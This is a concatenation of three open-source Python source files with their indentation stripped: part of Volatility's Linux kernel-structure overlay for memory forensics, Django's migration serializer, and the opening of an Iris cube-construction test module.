for path in set(volatility.plugins.__path__):
for path, _, files in os.walk(path):
for fn in files:
if zipfile.is_zipfile(os.path.join(path, fn)):
new_classes.append(LinuxProfileFactory(zipfile.ZipFile(os.path.join(path, fn))))
################################
# really 'file' but don't want to mess with python's version
class linux_file(obj.CType):
@property
def dentry(self):
if hasattr(self, "f_dentry"):
ret = self.f_dentry
else:
ret = self.f_path.dentry
return ret
@property
def vfsmnt(self):
if hasattr(self, "f_vfsmnt"):
ret = self.f_vfsmnt
else:
ret = self.f_path.mnt
return ret
# FIXME - walking backwards has not been thorougly tested
class hlist_node(obj.CType):
"""A hlist_node makes a doubly linked list."""
def list_of_type(self, obj_type, member, offset = -1, forward = True, head_sentinel = True):
if not self.is_valid():
return
## Get the first element
if forward:
nxt = self.next.dereference()
else:
nxt = self.pprev.dereference().dereference()
offset = self.obj_vm.profile.get_obj_offset(obj_type, member)
seen = set()
if head_sentinel:
# We're a header element and not to be included in the list
seen.add(self.obj_offset)
while nxt.is_valid() and nxt.obj_offset not in seen:
## Instantiate the object
item = obj.Object(obj_type, offset = nxt.obj_offset - offset,
vm = self.obj_vm,
parent = self.obj_parent,
name = obj_type)
seen.add(nxt.obj_offset)
yield item
if forward:
nxt = item.m(member).next.dereference()
else:
nxt = item.m(member).pprev.dereference().dereference()
def __nonzero__(self):
## List entries are valid when both Flinks and Blink are valid
return bool(self.next) or bool(self.pprev)
def __iter__(self):
return self.list_of_type(self.obj_parent.obj_name, self.obj_name)
class list_head(obj.CType):
"""A list_head makes a doubly linked list."""
def list_of_type(self, obj_type, member, offset = -1, forward = True, head_sentinel = True):
if not self.is_valid():
return
## Get the first element
if forward:
nxt = self.next.dereference()
else:
nxt = self.prev.dereference()
offset = self.obj_vm.profile.get_obj_offset(obj_type, member)
seen = set()
if head_sentinel:
# We're a header element and not to be included in the list
seen.add(self.obj_offset)
while nxt.is_valid() and nxt.obj_offset not in seen:
## Instantiate the object
item = obj.Object(obj_type, offset = nxt.obj_offset - offset,
vm = self.obj_vm,
parent = self.obj_parent,
name = obj_type)
seen.add(nxt.obj_offset)
yield item
if forward:
nxt = item.m(member).next.dereference()
else:
nxt = item.m(member).prev.dereference()
def __nonzero__(self):
## List entries are valid when both Flinks and Blink are valid
return bool(self.next) or bool(self.prev)
def __iter__(self):
return self.list_of_type(self.obj_parent.obj_name, self.obj_name)
class files_struct(obj.CType):
def get_fds(self):
if hasattr(self, "fdt"):
fdt = self.fdt
ret = fdt.fd.dereference()
else:
ret = self.fd.dereference()
return ret
def get_max_fds(self):
if hasattr(self, "fdt"):
ret = self.fdt.max_fds
else:
ret = self.max_fds
return ret
class kernel_param(obj.CType):
@property
def get(self):
if self.members.get("get"):
ret = self.m("get")
else:
ret = self.ops.get
return ret
class kparam_array(obj.CType):
@property
def get(self):
if self.members.get("get"):
ret = self.m("get")
else:
ret = self.ops.get
return ret
class gate_struct64(obj.CType):
@property
def Address(self):
low = self.offset_low
middle = self.offset_middle
high = self.offset_high
ret = (high << 32) | (middle << 16) | low
return ret
class desc_struct(obj.CType):
@property
def Address(self):
return (self.b & 0xffff0000) | (self.a & 0x0000ffff)
class module_sect_attr(obj.CType):
def get_name(self):
if type(self.m("name")) == obj.Array:
name = obj.Object("String", offset = self.m("name").obj_offset, vm = self.obj_vm, length = 32)
else:
name = self.name.dereference_as("String", length = 255)
return name
class inet_sock(obj.CType):
"""Class for an internet socket object"""
@property
def protocol(self):
"""Return the protocol string (i.e. IPv4, IPv6)"""
return protos.protos.get(self.sk.sk_protocol.v(), "UNKNOWN")
@property
def state(self):
state = self.sk.__sk_common.skc_state #pylint: disable-msg=W0212
return linux_flags.tcp_states[state]
@property
def src_port(self):
if hasattr(self, "sport"):
return socket.htons(self.sport)
elif hasattr(self, "inet_sport"):
return socket.htons(self.inet_sport)
else:
return None
@property
def dst_port(self):
if hasattr(self, "dport"):
return socket.htons(self.dport)
elif hasattr(self, "inet_dport"):
return socket.htons(self.inet_dport)
elif hasattr(self, "sk") and hasattr(self.sk, "__sk_common") and hasattr(self.sk.__sk_common, "skc_dport"):
return self.sk.__sk_common.skc_dport
else:
return None
@property
def src_addr(self):
if self.sk.__sk_common.skc_family == socket.AF_INET:
# FIXME: Consider using kernel version metadata rather than checking hasattr
if hasattr(self, "rcv_saddr"):
saddr = self.rcv_saddr
elif hasattr(self, "inet_rcv_saddr"):
saddr = self.inet_rcv_saddr
else:
saddr = self.sk.__sk_common.skc_rcv_saddr
return saddr.cast("IpAddress")
else:
return self.pinet6.saddr.cast("Ipv6Address")
@property
def dst_addr(self):
if self.sk.__sk_common.skc_family == socket.AF_INET:
# FIXME: Consider using kernel version metadata rather than checking hasattr
if hasattr(self, "daddr") and self.daddr:
daddr = self.daddr
elif hasattr(self, "inet_daddr") and self.inet_daddr:
daddr = self.inet_daddr
else:
daddr = self.sk.__sk_common.skc_daddr
return daddr.cast("IpAddress")
else:
return self.pinet6.daddr.cast("Ipv6Address")
class tty_ldisc(obj.CType):
@property
def ops(self):
check = self.members.get("ops")
if check:
ret = self.m('ops')
else:
ret = self
return ret
class in_device(obj.CType):
def devices(self):
cur = self.ifa_list
while cur != None and cur.is_valid():
yield cur
cur = cur.ifa_next
class net_device(obj.CType):
@property
def mac_addr(self):
if self.members.has_key("perm_addr"):
hwaddr = self.perm_addr
else:
hwaddr = self.dev_addr
macaddr = ":".join(["{0:02x}".format(x) for x in hwaddr][:6])
return macaddr
@property
def promisc(self):
return self.flags & 0x100 == 0x100 # IFF_PROMISC
class task_struct(obj.CType):
def is_valid_task(self):
ret = self.fs.v() != 0 and self.files.v() != 0
if ret and self.members.get("cred"):
ret = self.cred.is_valid()
return ret
@property
def uid(self):
ret = self.members.get("uid")
if ret is None:
ret = self.cred.uid
else:
ret = self.m("uid")
return ret
@property
def gid(self):
ret = self.members.get("gid")
if ret is None:
gid = self.cred.gid
if hasattr(gid, 'counter'):
ret = obj.Object("int", offset = gid.v(), vm = self.obj_vm)
else:
ret = gid
else:
ret = self.m("gid")
return ret
@property
def euid(self):
ret = self.members.get("euid")
if ret is None:
ret = self.cred.euid
else:
ret = self.m("euid")
return ret
def get_process_address_space(self):
## If we've got a NoneObject, return it maintain the reason
if self.mm.pgd.v() == None:
return self.mm.pgd.v()
directory_table_base = self.obj_vm.vtop(self.mm.pgd.v())
try:
process_as = self.obj_vm.__class__(
self.obj_vm.base, self.obj_vm.get_config(), dtb = directory_table_base)
except AssertionError, _e:
return obj.NoneObject("Unable to get process AS")
process_as.name = "Process {0}".format(self.pid)
return process_as
def get_proc_maps(self):
for vma in linux_common.walk_internal_list("vm_area_struct", "vm_next", self.mm.mmap):
yield vma
def search_process_memory(self, s, heap_only = False):
# Allow for some overlap in case objects are
# right on page boundaries
overlap = 1024
# Make sure s in a list. This allows you to search for
# multiple strings at once, without changing the API.
if type(s) != list:
debug.warning("Single strings to search_process_memory is deprecated, use a list instead")
s = [s]
scan_blk_sz = 1024 * 1024 * 10
addr_space = self.get_process_address_space()
for vma in self.get_proc_maps():
if heap_only:
if not (vma.vm_start <= self.mm.start_brk and vma.vm_end >= self.mm.brk):
continue
offset = vma.vm_start
out_of_range = vma.vm_start + (vma.vm_end - vma.vm_start)
while offset < out_of_range:
# Read some data and match it.
to_read = min(scan_blk_sz + overlap, out_of_range - offset)
data = addr_space.zread(offset, to_read)
if not data:
break
for x in s:
for hit in utils.iterfind(data, x):
yield offset + hit
offset += min(to_read, scan_blk_sz)
def ACTHZ(self, CLOCK_TICK_RATE, HZ):
LATCH = ((CLOCK_TICK_RATE + HZ/2) / HZ)
return self.SH_DIV(CLOCK_TICK_RATE, LATCH, 8)
def SH_DIV(self, NOM, DEN, LSH):
return ((NOM / DEN) << LSH) + (((NOM % DEN) << LSH) + DEN / 2) / DEN
def TICK_NSEC(self):
HZ = 1000
CLOCK_TICK_RATE = 1193182
return self.SH_DIV(1000000 * 1000, self.ACTHZ(CLOCK_TICK_RATE, HZ), 8)
def get_time_vars(self):
'''
Sometime in 3.[3-5], Linux switched to a global timekeeper structure
This just figures out which is in use and returns the correct variables
'''
wall_addr = self.obj_vm.profile.get_symbol("wall_to_monotonic")
sleep_addr = self.obj_vm.profile.get_symbol("total_sleep_time")
# old way
if wall_addr and sleep_addr:
wall = obj.Object("timespec", offset = wall_addr, vm = self.obj_vm)
timeo = obj.Object("timespec", offset = sleep_addr, vm = self.obj_vm)
elif wall_addr:
wall = obj.Object("timespec", offset = wall_addr, vm = self.obj_vm)
init_task_addr = self.obj_vm.profile.get_symbol("init_task")
init_task = obj.Object("task_struct", offset = init_task_addr, vm = self.obj_vm)
time_val = init_task.utime + init_task.stime
nsec = time_val * self.TICK_NSEC()
tv_sec = nsec / linux_common.nsecs_per
tv_nsec = nsec % linux_common.nsecs_per
timeo = linux_common.vol_timespec(tv_sec, tv_nsec)
# timekeeper way
else:
timekeeper_addr = self.obj_vm.profile.get_symbol("timekeeper")
timekeeper = obj.Object("timekeeper", offset = timekeeper_addr, vm = self.obj_vm)
wall = timekeeper.wall_to_monotonic
timeo = timekeeper.total_sleep_time
return (wall, timeo)
# based on 2.6.35 getboottime
def get_boot_time(self):
(wall, timeo) = self.get_time_vars()
secs = wall.tv_sec + timeo.tv_sec
nsecs = wall.tv_nsec + timeo.tv_nsec
secs = secs * -1
nsecs = nsecs * -1
while nsecs >= linux_common.nsecs_per:
nsecs = nsecs - linux_common.nsecs_per
secs = secs + 1
while nsecs < 0:
nsecs = nsecs + linux_common.nsecs_per
secs = secs - 1
boot_time = secs + (nsecs / linux_common.nsecs_per / 100)
return boot_time
def get_task_start_time(self):
start_time = self.start_time
start_secs = start_time.tv_sec + (start_time.tv_nsec / linux_common.nsecs_per / 100)
sec = self.get_boot_time() + start_secs
# convert the integer as little endian
try:
data = struct.pack("<I", sec)
except struct.error:
# in case we exceed 0 <= number <= 4294967295
return ""
bufferas = addrspace.BufferAddressSpace(self.obj_vm.get_config(), data = data)
dt = obj.Object("UnixTimeStamp", offset = 0, vm = bufferas, is_utc = True)
return dt
def get_commandline(self):
if self.mm:
# set the as with our new dtb so we can read from userland
proc_as = self.get_process_address_space()
# read argv from userland
start = self.mm.arg_start.v()
argv = proc_as.read(start, self.mm.arg_end - self.mm.arg_start)
if argv:
# split the \x00 buffer into args
name = " ".join(argv.split("\x00"))
else:
name = ""
else:
# kernel thread
name = "[" + self.comm + "]"
return name
class linux_fs_struct(obj.CType):
def get_root_dentry(self):
# < 2.6.26
if hasattr(self, "rootmnt"):
ret = self.root
else:
ret = self.root.dentry
return ret
def get_root_mnt(self):
# < 2.6.26
if hasattr(self, "rootmnt"):
ret = self.rootmnt
else:
ret = self.root.mnt
return ret
class super_block(obj.CType):
@property
def major(self):
return self.s_dev >> 20
@property
def minor(self):
return self.s_dev & ((1 << 20) - 1)
class inode(obj.CType):
def is_dir(self):
"""Mimic the S_ISDIR macro"""
return self.i_mode & linux_flags.S_IFMT == linux_flags.S_IFDIR
def is_reg(self):
"""Mimic the S_ISREG macro"""
return self.i_mode & linux_flags.S_IFMT == linux_flags.S_IFREG
class timespec(obj.CType):
def as_timestamp(self):
time_val = struct.pack("<I", self.tv_sec)
time_buf = addrspace.BufferAddressSpace(self.obj_vm.get_config(), data = time_val)
time_obj = obj.Object("UnixTimeStamp", offset = 0, vm = time_buf, is_utc = True)
return time_obj
class dentry(obj.CType):
def get_partial_path(self):
""" we can't get the full path b/c we
do not have a ref to the vfsmnt """
path = []
name = ""
dentry = self
while dentry and dentry != dentry.d_parent:
name = dentry.d_name.name.dereference_as("String", length = 255)
if name.is_valid():
path.append(str(name))
dentry = dentry.d_parent
path.reverse()
str_path = "/".join([p for p in path])
return str_path
class VolatilityDTB(obj.VolatilityMagic):
"""A scanner for DTB values."""
def generate_suggestions(self):
"""Tries to locate the DTB."""
shift = 0xc0000000
# this is the only code allowed to reference the internal sys_map!
yield self.obj_vm.profile.get_symbol("swapper_pg_dir") - shift
# the intel check, simply checks for the static paging of init_task
class VolatilityLinuxIntelValidAS(obj.VolatilityMagic):
"""An object to check that an address space is a valid Arm Paged space"""
def generate_suggestions(self):
init_task_addr = self.obj_vm.profile.get_symbol("init_task")
if self.obj_vm.profile.metadata.get('memory_model', '32bit') == "32bit":
shift = 0xc0000000
else:
shift = 0xffffffff80000000
yield self.obj_vm.vtop(init_task_addr) == init_task_addr - shift
# the ARM check, has to check multiple values b/c phones do not map RAM at 0
class VolatilityLinuxARMValidAS(obj.VolatilityMagic):
"""An object to check that an address space is a valid Arm Paged space"""
def generate_suggestions(self):
init_task_addr = self.obj_vm.profile.get_symbol("init_task")
do_fork_addr = self.obj_vm.profile.get_symbol("do_fork")
sym_addr_diff = (do_fork_addr - init_task_addr)
if self.obj_vm.profile.metadata.get('memory_model', '32bit') == "32bit":
shift = 0xc0000000
else:
shift = 0xffffffff80000000
task_paddr = self.obj_vm.vtop(init_task_addr)
fork_paddr = self.obj_vm.vtop(do_fork_addr)
if task_paddr and fork_paddr:
# these won't be zero due to RAM not at physical address 0
# but if the offset from 0 is the same across two paging operations
# then we have the right DTB
task_off = task_paddr - shift
fork_off = fork_paddr - shift
yield fork_off - task_off == sym_addr_diff
class LinuxObjectClasses(obj.ProfileModification):
conditions = {'os': lambda x: x == 'linux'}
before = ['BasicObjectClasses']
def modification(self, profile):
profile.object_classes.update({
'fs_struct': linux_fs_struct,
'file': linux_file,
'list_head': list_head,
'hlist_node': hlist_node,
'files_struct': files_struct,
'task_struct': task_struct,
'net_device' : net_device,
'in_device' : in_device,
'tty_ldisc' : tty_ldisc,
'module_sect_attr' : module_sect_attr,
'VolatilityDTB': VolatilityDTB,
'IpAddress': basic.IpAddress,
'Ipv6Address': basic.Ipv6Address,
'VolatilityLinuxIntelValidAS' : VolatilityLinuxIntelValidAS,
'VolatilityLinuxARMValidAS' : VolatilityLinuxARMValidAS,
'kernel_param' : kernel_param,
'kparam_array' : kparam_array,
'gate_struct64' : gate_struct64,
'desc_struct' : desc_struct,
'page': page,
'LinuxPermissionFlags': LinuxPermissionFlags,
'super_block' : super_block,
'inode' : inode,
'dentry' : dentry,
'timespec' : timespec,
'inet_sock' : inet_sock,
})
class LinuxOverlay(obj.ProfileModification):
conditions = {'os': lambda x: x == 'linux'}
before = ['BasicObjectClasses'] # , 'LinuxVTypes']
def modification(self, profile):
profile.merge_overlay(linux_overlay)
class LinuxIntelOverlay(obj.ProfileModification):
conditions = {'os': lambda x: x == 'linux',
'arch' : lambda x: x == 'x86' or x == 'x64'}
before = ['BasicObjectClasses'] # , 'LinuxVTypes']
def modification(self, profile):
profile.merge_overlay(intel_overlay)
class page(obj.CType):
def to_vaddr(self):
#FIXME Do it!
pass
def to_paddr(self):
mem_map_addr = self.obj_vm.profile.get_symbol("mem_map")
mem_section_addr = self.obj_vm.profile.get_symbol("mem_section")
if mem_map_addr:
# FLATMEM kernels, usually 32 bit
mem_map_ptr = obj.Object("Pointer", offset = mem_map_addr, vm = self.obj_vm, parent = self.obj_parent)
elif mem_section_addr:
# this is hardcoded in the kernel - VMEMMAPSTART, usually 64 bit kernels
mem_map_ptr = 0xffffea0000000000
else:
debug.error("phys_addr_of_page: Unable to determine physical address of page. NUMA is not supported at this time.\n")
phys_offset = (self.obj_offset - mem_map_ptr) / self.obj_vm.profile.get_obj_size("page")
phys_offset = phys_offset << 12
return phys_offset
class mount(obj.CType):
@property
def mnt_sb(self):
if hasattr(self, "mnt"):
ret = self.mnt.mnt_sb
else:
ret = self.mnt_sb
return ret
@property
def mnt_root(self):
if hasattr(self, "mnt"):
ret = self.mnt.mnt_root
else:
ret = self.mnt_root
return ret
@property
def mnt_flags(self):
if hasattr(self, "mnt"):
ret = self.mnt.mnt_flags
else:
ret = self.mnt_flags
return ret
class vfsmount(obj.CType):
def _get_real_mnt(self):
offset = self.obj_vm.profile.get_obj_offset("mount", "mnt")
mnt = obj.Object("mount", offset = self.obj_offset - offset, vm = self.obj_vm)
return mnt
@property
def mnt_parent(self):
ret = self.members.get("mnt_parent")
if ret is None:
ret = self._get_real_mnt().mnt_parent
else:
ret = self.m("mnt_parent")
return ret
@property
def mnt_mountpoint(self):
ret = self.members.get("mnt_mountpoint")
if ret is None:
ret = self._get_real_mnt().mnt_mountpoint
else:
ret = self.m("mnt_mountpoint")
return ret
class LinuxMountOverlay(obj.ProfileModification):
conditions = {'os': lambda x: x == 'linux'}
before = ['BasicObjectClasses'] # , 'LinuxVTypes']
def modification(self, profile):
if profile.vtypes.get("mount"):
profile.object_classes.update({'mount' : mount, 'vfsmount' : vfsmount})
| gpl-2.0 |
bak1an/django | django/db/migrations/serializer.py | 18 | 13453 | import builtins
import collections
import datetime
import decimal
import enum
import functools
import math
import re
import types
import uuid
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.utils import COMPILED_REGEX_TYPE, RegexObject
from django.utils import datetime_safe
from django.utils.encoding import force_text
from django.utils.functional import LazyObject, Promise
from django.utils.timezone import utc
from django.utils.version import get_docs_version
class BaseSerializer:
def __init__(self, value):
self.value = value
def serialize(self):
raise NotImplementedError('Subclasses of BaseSerializer must implement the serialize() method.')
class BaseSequenceSerializer(BaseSerializer):
def _format(self):
raise NotImplementedError('Subclasses of BaseSequenceSerializer must implement the _format() method.')
def serialize(self):
imports = set()
strings = []
for item in self.value:
item_string, item_imports = serializer_factory(item).serialize()
imports.update(item_imports)
strings.append(item_string)
value = self._format()
return value % (", ".join(strings)), imports
class BaseSimpleSerializer(BaseSerializer):
def serialize(self):
return repr(self.value), set()
class ByteTypeSerializer(BaseSerializer):
def serialize(self):
return repr(self.value), set()
class DatetimeSerializer(BaseSerializer):
def serialize(self):
if self.value.tzinfo is not None and self.value.tzinfo != utc:
self.value = self.value.astimezone(utc)
value_repr = repr(self.value).replace("<UTC>", "utc")
if isinstance(self.value, datetime_safe.datetime):
value_repr = "datetime.%s" % value_repr
imports = ["import datetime"]
if self.value.tzinfo is not None:
imports.append("from django.utils.timezone import utc")
return value_repr, set(imports)
class DateSerializer(BaseSerializer):
def serialize(self):
value_repr = repr(self.value)
if isinstance(self.value, datetime_safe.date):
value_repr = "datetime.%s" % value_repr
return value_repr, {"import datetime"}
class DecimalSerializer(BaseSerializer):
def serialize(self):
return repr(self.value), {"from decimal import Decimal"}
class DeconstructableSerializer(BaseSerializer):
@staticmethod
def serialize_deconstructed(path, args, kwargs):
name, imports = DeconstructableSerializer._serialize_path(path)
strings = []
for arg in args:
arg_string, arg_imports = serializer_factory(arg).serialize()
strings.append(arg_string)
imports.update(arg_imports)
for kw, arg in sorted(kwargs.items()):
arg_string, arg_imports = serializer_factory(arg).serialize()
imports.update(arg_imports)
strings.append("%s=%s" % (kw, arg_string))
return "%s(%s)" % (name, ", ".join(strings)), imports
@staticmethod
def _serialize_path(path):
module, name = path.rsplit(".", 1)
if module == "django.db.models":
imports = {"from django.db import models"}
name = "models.%s" % name
else:
imports = {"import %s" % module}
name = path
return name, imports
def serialize(self):
return self.serialize_deconstructed(*self.value.deconstruct())
class DictionarySerializer(BaseSerializer):
def serialize(self):
imports = set()
strings = []
for k, v in sorted(self.value.items()):
k_string, k_imports = serializer_factory(k).serialize()
v_string, v_imports = serializer_factory(v).serialize()
imports.update(k_imports)
imports.update(v_imports)
strings.append((k_string, v_string))
return "{%s}" % (", ".join("%s: %s" % (k, v) for k, v in strings)), imports
class EnumSerializer(BaseSerializer):
def serialize(self):
enum_class = self.value.__class__
module = enum_class.__module__
imports = {"import %s" % module}
v_string, v_imports = serializer_factory(self.value.value).serialize()
imports.update(v_imports)
return "%s.%s(%s)" % (module, enum_class.__name__, v_string), imports
class FloatSerializer(BaseSimpleSerializer):
def serialize(self):
if math.isnan(self.value) or math.isinf(self.value):
return 'float("{}")'.format(self.value), set()
return super().serialize()
class FrozensetSerializer(BaseSequenceSerializer):
def _format(self):
return "frozenset([%s])"
class FunctionTypeSerializer(BaseSerializer):
def serialize(self):
if getattr(self.value, "__self__", None) and isinstance(self.value.__self__, type):
klass = self.value.__self__
module = klass.__module__
return "%s.%s.%s" % (module, klass.__name__, self.value.__name__), {"import %s" % module}
# Further error checking
if self.value.__name__ == '<lambda>':
raise ValueError("Cannot serialize function: lambda")
if self.value.__module__ is None:
raise ValueError("Cannot serialize function %r: No module" % self.value)
module_name = self.value.__module__
if '<' not in self.value.__qualname__: # Qualname can include <locals>
return '%s.%s' % (module_name, self.value.__qualname__), {'import %s' % self.value.__module__}
raise ValueError(
'Could not find function %s in %s.\n' % (self.value.__name__, module_name)
)
class FunctoolsPartialSerializer(BaseSerializer):
def serialize(self):
imports = {'import functools'}
# Serialize functools.partial() arguments
func_string, func_imports = serializer_factory(self.value.func).serialize()
args_string, args_imports = serializer_factory(self.value.args).serialize()
keywords_string, keywords_imports = serializer_factory(self.value.keywords).serialize()
# Add any imports needed by arguments
imports.update(func_imports)
imports.update(args_imports)
imports.update(keywords_imports)
return (
"functools.partial(%s, *%s, **%s)" % (
func_string, args_string, keywords_string,
),
imports,
)
class IterableSerializer(BaseSerializer):
def serialize(self):
imports = set()
strings = []
for item in self.value:
item_string, item_imports = serializer_factory(item).serialize()
imports.update(item_imports)
strings.append(item_string)
# When len(strings)==0, the empty iterable should be serialized as
# "()", not "(,)" because (,) is invalid Python syntax.
value = "(%s)" if len(strings) != 1 else "(%s,)"
return value % (", ".join(strings)), imports
class ModelFieldSerializer(DeconstructableSerializer):
def serialize(self):
attr_name, path, args, kwargs = self.value.deconstruct()
return self.serialize_deconstructed(path, args, kwargs)
class ModelManagerSerializer(DeconstructableSerializer):
def serialize(self):
as_manager, manager_path, qs_path, args, kwargs = self.value.deconstruct()
if as_manager:
name, imports = self._serialize_path(qs_path)
return "%s.as_manager()" % name, imports
else:
return self.serialize_deconstructed(manager_path, args, kwargs)
class OperationSerializer(BaseSerializer):
def serialize(self):
from django.db.migrations.writer import OperationWriter
string, imports = OperationWriter(self.value, indentation=0).serialize()
# Nested operation, trailing comma is handled in upper OperationWriter._write()
return string.rstrip(','), imports
class RegexSerializer(BaseSerializer):
def serialize(self):
imports = {"import re"}
regex_pattern, pattern_imports = serializer_factory(self.value.pattern).serialize()
# Turn off default implicit flags (e.g. re.U) because regexes with the
# same implicit and explicit flags aren't equal.
flags = self.value.flags ^ re.compile('').flags
regex_flags, flag_imports = serializer_factory(flags).serialize()
imports.update(pattern_imports)
imports.update(flag_imports)
args = [regex_pattern]
if flags:
args.append(regex_flags)
return "re.compile(%s)" % ', '.join(args), imports
class SequenceSerializer(BaseSequenceSerializer):
def _format(self):
return "[%s]"
class SetSerializer(BaseSequenceSerializer):
def _format(self):
# Don't use the literal "{%s}" as it doesn't support empty set
return "set([%s])"
class SettingsReferenceSerializer(BaseSerializer):
def serialize(self):
return "settings.%s" % self.value.setting_name, {"from django.conf import settings"}
class TextTypeSerializer(BaseSerializer):
def serialize(self):
return repr(self.value), set()
class TimedeltaSerializer(BaseSerializer):
def serialize(self):
return repr(self.value), {"import datetime"}
class TimeSerializer(BaseSerializer):
def serialize(self):
value_repr = repr(self.value)
if isinstance(self.value, datetime_safe.time):
value_repr = "datetime.%s" % value_repr
return value_repr, {"import datetime"}
class TupleSerializer(BaseSequenceSerializer):
def _format(self):
# When len(value)==0, the empty tuple should be serialized as "()",
# not "(,)" because (,) is invalid Python syntax.
return "(%s)" if len(self.value) != 1 else "(%s,)"
class TypeSerializer(BaseSerializer):
def serialize(self):
special_cases = [
(models.Model, "models.Model", []),
]
for case, string, imports in special_cases:
if case is self.value:
return string, set(imports)
if hasattr(self.value, "__module__"):
module = self.value.__module__
if module == builtins.__name__:
return self.value.__name__, set()
else:
return "%s.%s" % (module, self.value.__name__), {"import %s" % module}
class UUIDSerializer(BaseSerializer):
def serialize(self):
return "uuid.%s" % repr(self.value), {"import uuid"}
def serializer_factory(value):
from django.db.migrations.writer import SettingsReference
if isinstance(value, Promise):
value = force_text(value)
elif isinstance(value, LazyObject):
# The unwrapped value is returned as the first item of the arguments
# tuple.
value = value.__reduce__()[1][0]
if isinstance(value, models.Field):
return ModelFieldSerializer(value)
if isinstance(value, models.manager.BaseManager):
return ModelManagerSerializer(value)
if isinstance(value, Operation):
return OperationSerializer(value)
if isinstance(value, type):
return TypeSerializer(value)
# Anything that knows how to deconstruct itself.
if hasattr(value, 'deconstruct'):
return DeconstructableSerializer(value)
# Unfortunately some of these are order-dependent.
if isinstance(value, frozenset):
return FrozensetSerializer(value)
if isinstance(value, list):
return SequenceSerializer(value)
if isinstance(value, set):
return SetSerializer(value)
if isinstance(value, tuple):
return TupleSerializer(value)
if isinstance(value, dict):
return DictionarySerializer(value)
if isinstance(value, enum.Enum):
return EnumSerializer(value)
if isinstance(value, datetime.datetime):
return DatetimeSerializer(value)
if isinstance(value, datetime.date):
return DateSerializer(value)
if isinstance(value, datetime.time):
return TimeSerializer(value)
if isinstance(value, datetime.timedelta):
return TimedeltaSerializer(value)
if isinstance(value, SettingsReference):
return SettingsReferenceSerializer(value)
if isinstance(value, float):
return FloatSerializer(value)
if isinstance(value, (bool, int, type(None))):
return BaseSimpleSerializer(value)
if isinstance(value, bytes):
return ByteTypeSerializer(value)
if isinstance(value, str):
return TextTypeSerializer(value)
if isinstance(value, decimal.Decimal):
return DecimalSerializer(value)
if isinstance(value, functools.partial):
return FunctoolsPartialSerializer(value)
if isinstance(value, (types.FunctionType, types.BuiltinFunctionType, types.MethodType)):
return FunctionTypeSerializer(value)
if isinstance(value, collections.Iterable):
return IterableSerializer(value)
if isinstance(value, (COMPILED_REGEX_TYPE, RegexObject)):
return RegexSerializer(value)
if isinstance(value, uuid.UUID):
return UUIDSerializer(value)
raise ValueError(
"Cannot serialize: %r\nThere are some values Django cannot serialize into "
"migration files.\nFor more, see https://docs.djangoproject.com/en/%s/"
"topics/migrations/#migration-serializing" % (value, get_docs_version())
)
| bsd-3-clause |
marqh/iris | lib/iris/tests/test_cdm.py | 3 | 51630 | # (C) British Crown Copyright 2010 - 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Test cube indexing, slicing, and extracting, and also the dot graphs.
"""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
import six
# import iris tests first so that some things can be initialised before importing anything else
import iris.tests as tests
from contextlib import contextmanager
import os
import re
import sys
import unittest
import cf_units
import numpy as np
import numpy.ma as ma
import iris
import iris.analysis
import iris.coords
import iris.cube
import iris.fileformats
import iris.fileformats.dot
import iris.tests.pp as pp
import iris.tests.stock
class IrisDotTest(tests.IrisTest):
def check_dot(self, cube, reference_filename):
test_string = iris.fileformats.dot.cube_text(cube)
reference_path = tests.get_result_path(reference_filename)
if os.path.isfile(reference_path):
with open(reference_path, 'r') as reference_fh:
reference = ''.join(reference_fh.readlines())
self._assert_str_same(reference, test_string, reference_filename, type_comparison_name='DOT files')
else:
with open(reference_path, 'w') as reference_fh:
reference_fh.writelines(test_string)
class TestBasicCubeConstruction(tests.IrisTest):
def setUp(self):
self.cube = iris.cube.Cube(np.arange(12, dtype=np.int32).reshape((3, 4)), long_name='test cube')
self.x = iris.coords.DimCoord(np.array([ -7.5, 7.5, 22.5, 37.5]), long_name='x')
self.y = iris.coords.DimCoord(np.array([ 2.5, 7.5, 12.5]), long_name='y')
self.xy = iris.coords.AuxCoord(np.arange(12).reshape((3, 4)) * 3.0, long_name='xy')
def test_add_dim_coord(self):
# Lengths must match
with self.assertRaises(ValueError):
self.cube.add_dim_coord(self.y, 1)
with self.assertRaises(ValueError):
self.cube.add_dim_coord(self.x, 0)
# Must specify a dimension
with self.assertRaises(TypeError):
self.cube.add_dim_coord(self.y)
# Add y
self.cube.add_dim_coord(self.y, 0)
self.assertEqual(self.cube.coords(), [self.y])
self.assertEqual(self.cube.dim_coords, (self.y,))
# Add x
self.cube.add_dim_coord(self.x, 1)
self.assertEqual(self.cube.coords(), [self.y, self.x])
self.assertEqual(self.cube.dim_coords, (self.y, self.x))
# Cannot add a coord twice
with self.assertRaises(ValueError):
self.cube.add_dim_coord(self.y, 0)
# ... even to cube.aux_coords
with self.assertRaises(ValueError):
self.cube.add_aux_coord(self.y, 0)
# Can't add AuxCoord to dim_coords
y_other = iris.coords.AuxCoord(np.array([ 2.5, 7.5, 12.5]), long_name='y_other')
with self.assertRaises(ValueError):
self.cube.add_dim_coord(y_other, 0)
def test_add_scalar_coord(self):
scalar_dim_coord = iris.coords.DimCoord(23, long_name='scalar_dim_coord')
scalar_aux_coord = iris.coords.AuxCoord(23, long_name='scalar_aux_coord')
# Scalars cannot be in cube.dim_coords
with self.assertRaises(TypeError):
self.cube.add_dim_coord(scalar_dim_coord)
with self.assertRaises(TypeError):
self.cube.add_dim_coord(scalar_dim_coord, None)
with self.assertRaises(ValueError):
self.cube.add_dim_coord(scalar_dim_coord, [])
with self.assertRaises(ValueError):
self.cube.add_dim_coord(scalar_dim_coord, ())
# Make sure that's still the case for a 0-dimensional cube.
cube = iris.cube.Cube(666)
self.assertEqual(cube.ndim, 0)
with self.assertRaises(TypeError):
self.cube.add_dim_coord(scalar_dim_coord)
with self.assertRaises(TypeError):
self.cube.add_dim_coord(scalar_dim_coord, None)
with self.assertRaises(ValueError):
self.cube.add_dim_coord(scalar_dim_coord, [])
with self.assertRaises(ValueError):
self.cube.add_dim_coord(scalar_dim_coord, ())
